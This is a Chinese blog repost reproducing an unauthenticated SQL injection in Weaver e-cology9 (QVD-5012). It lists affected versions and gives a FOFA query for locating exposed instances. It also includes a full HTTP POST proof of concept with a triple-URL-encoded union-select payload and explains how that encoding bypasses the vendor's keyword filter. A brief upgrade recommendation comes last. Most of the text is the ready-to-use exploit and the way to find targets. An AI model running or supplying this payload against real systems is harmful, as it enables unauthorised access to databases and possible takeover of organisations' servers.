700字范文,内容丰富有趣,生活中的好帮手!
700字范文 > 泛微e-cology9 SQL注入漏洞复现(QVD--5012)

泛微e-cology9 SQL注入漏洞复现(QVD--5012)

时间:2020-08-02 19:42:54

相关推荐

泛微e-cology9 SQL注入漏洞复现(QVD--5012)

1、产品简介

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。

2、漏洞概述

泛微e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。

3、影响范围

影响版本

泛微e-cology9 <= 10.55

不受影响版本

泛微e-cology9 >= 10.56

4、复现环境

FOFA:app="泛微-协同商务系统"

5、漏洞复现

访问漏洞环境,burp抓包发送Repeater模块进行利用

当前网上流传的POC

POST /mobile/%20/plugin/browser.jsp HTTP/1.1Host: your-ipContent-Type: application/x-www-form-urlencodedContent-Length: 651isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

注:POC中需要传入三个参数

1、 isDis必须为1

2、browserTypeId对应方法

3、keyword为注入点,并且要进行3次url编码逃逸泛微的过滤机制 (泛微的黑名单机制会把关键字替换为全角字符)

查询数据库版本信息

复现成功

6、修复建议

目前官方已发布安全补丁,建议受影响用户尽快升级至10.56及以上版本。

/cs/securityDownload.asp

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。